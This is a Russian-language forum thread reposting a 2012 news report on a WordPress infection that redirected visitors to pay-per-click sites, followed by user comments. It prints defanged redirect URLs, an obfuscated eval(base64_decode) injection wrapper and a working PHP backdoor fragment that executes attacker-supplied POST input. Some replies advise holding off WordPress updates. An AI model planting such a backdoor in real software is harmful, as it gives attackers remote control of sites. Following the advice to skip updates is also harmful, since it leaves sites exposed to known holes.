[G00D]

Более 1000 блогов на платформе Wordpress уже инфицированы зловредом, который заранее внедрился в скрипт автоматического обновления wp-admin/includes/update.php. Атаку обнаружил Денис Синегубко из компании Unmask Parasites.

Поскольку атака началась в районе 20 апреля, перед выходом новой версии Wordpress 3.3.2, к настоящему моменту функцией автоматического обновления воспользовалось большое количество админов. Многие из них, таким образом, добавили в свои блоги вредоносный код.

Инфицированные сайты осуществляют редирект по следующим адресам:

Код:

hxxp://berega .in/?site=<site id>&q=<search query>&searchEngine=<engine id>
hxxp://zizigoba .in/?site=<site id>&q=<search query>&searchEngine=<engine id>
hxxp://vivizaza .be/?site=<site id>8&q=<search query>&searchEngine=<engine id>

Затем пользователей перенаправляют по URL вроде таких:

Код:

hxxp://riotorio .com/search/?q=<search query>
hxxp://lazgosearch .com/search?_t=1&q=<search query>
http://gabazasearch .com/?_t=1&q=<search query>

В итоге, злоумышленники осуществляют монетизацию трафика с помощью рекламных программ с оплатой за клики.

Атака проведена путём внедрения в файл wp-settings.php дополнительного кода:

Код:

// For an advanced caching plugin to use. Uses a static drop-in because you would only want one.
// Start cache settings
eval(base64_decode('...long unreadable string here...'));
// Finish cache settings
// Start cache settings
// Finish cache settings

В коде есть несколько интересных особенностей. Например, он устанавливает cookie и перенаправляет пользователей только в том случае, если cookie отсутствует. Более того, он отправляет IP-адрес пользователя на удалённый сервер, чтобы блокировать редирект для этого IP в будущем. Всё это сделано для скрытия атаки путём затруднения её повторения.

Есть фрагмент, который выполняет функцию бэкдора, так что злоумышленники могут позже модифицировать код на каждом заражённом сервере.

Код:

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv'])) {
$c = $_POST['cadv'];
$c = str_replace("\\\\", "\\", $c);
$g = $_POST['gadv'];
$g = str_replace("\\\"", "\"", $g);
$r = preg_replace("$c", $g, 'sss 4');
die();
}

Кроме wp-settings.php, модификации подвергается функция wp_update_core в файле wp-admin/includes/update.php. Расшифрованный код см. здесь. Именно она отвечает за осуществление автоматического обновления Wordpress.

Дата: 04.05.2012
hxxp://www.xakep.ru/post/58653/

[yurcheHk0]

благо я редко обновляюсь. я правильно понимаю, если я зайду с другого компа на свой сайт меня перекинет на один из сайтов указанных выше?

[free]

Я вообще уже год не обновляю и вроде все норм))

[DarkAngel-163]

Я обновляю лишь из-за того, что бесит вечная напоминалка, но вредоносного кода я не заметил.

[TbIKBA]

Я вообще уже год не обновляю и вроде все норм))

Зря, периодически обновления содержат в себе заплатки на дыры в безопасности

[Ems]

заранее внедрился в скрипт автоматического обновления wp-admin/includes/update.php

Каким образом? Откуда такая паника. Так просто он туда пролезть не мог. Если с доступом к файлам всё нормально, ftp не взломано, пароли не уведены - то должно быть всё ок.

[G00D]

Ems,Насчёт автоматизаций нечего сказать не могу,но:
Т.к. есть фрагмент, который выполняет функцию бэкдора, так что злоумышленники могут позже модифицировать код на каждом заражённом сервере=>вручную правят.

[forsale]

Ну я так понял это было так только в самом начале, сейчас проблема устранена или обновляться на автомате по прежнему нестоит?

[G00D]

forsale,Думаю не стоит обновлять WP до версий 3.3.2.
Как поступит официальное обращение к вебмастерам,о закрытий уязвимости,тогда и стоит обновить.

[ALEX-on]

я свой обновил, вроде бы все нормально, никаких приколов не заметил..